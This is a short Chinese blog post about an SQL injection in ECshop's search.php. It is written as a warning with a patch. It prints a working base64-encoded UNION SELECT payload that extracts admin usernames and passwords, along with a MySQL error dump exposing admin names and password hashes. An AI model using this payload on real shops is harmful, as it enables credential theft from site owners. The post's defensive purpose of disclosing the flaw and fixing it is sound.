首页 » 二次开发 » 阅读文章
ECshop搜索SQL注入问题的解决方案
search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIEdST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweDNhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3VzZXIjIjtzOjE6IjEiO319pTXcopyd-code
base64_decode后的语句!
a:1:{s:4:”attr”;a:1:{s:125:”1′) and 1=2 GROUP BY goods_id union all select concat(user_name,0x3a,password,'”\’) union select 1#”‘),1 from ecs_admin_user#”;s:1:”1″;}}
今天在一个0day上看到。 本地环境测试2.7.2. 直接包曝出。。。希望大家注意。尽快修补。我刚刚入从C#转入php能力不够,望高手修补。影响还是比较大的!
MySQL server error report:Array( [0] => Array ( [message] => MySQL Query Error ) [1] => Array ( [sql] => SELECT g.goods_id, g.goods_name, g.market_price, g.is_new, g.is_best, g.is_hot, g.shop_price AS org_price, IFNULL(mp.user_price, g.shop_price * ‘1’) AS shop_price, g.promote_price, g.promote_start_date, g.promote_end_date, g.goods_thumb, g.goods_img, g.goods_brief, g.goods_type FROM `ecshop`.`ecs_goods` AS g LEFT JOIN `ecshop`.`ecs_member_price` AS mp ON mp.goods_id = g.goods_id AND mp.user_rank = ‘0’ WHERE g.is_delete = 0 AND g.is_on_sale = 1 AND g.is_alone_sale = 1 AND g.goods_id IN (‘dsktt:f1848c3adc916b8ccf6759ae29f5bfe8″‘) union select 1#”‘,’bjgonghuo1:d0c015b6eb9a280f318a4c0510581e7e”‘) union select 1#”‘,’shhaigonghuo1:4146fecce77907d264f6bd873f4ea27b”‘) union select 1#”‘) AND (( 1 ) ) ORDER BY goods_id DESC LIMIT 10 ) [2] => Array ( [error] => The used SELECT statements have a different number of columns ) [3] => Array ( [errno] => 1222 ))
解决方案
search.php
大概300 源
if (is_not_null($val) )
修改为
if (is_not_null($val) && is_numeric($key))
就可以了
评论 共0条 (RSS 2.0) 发表评论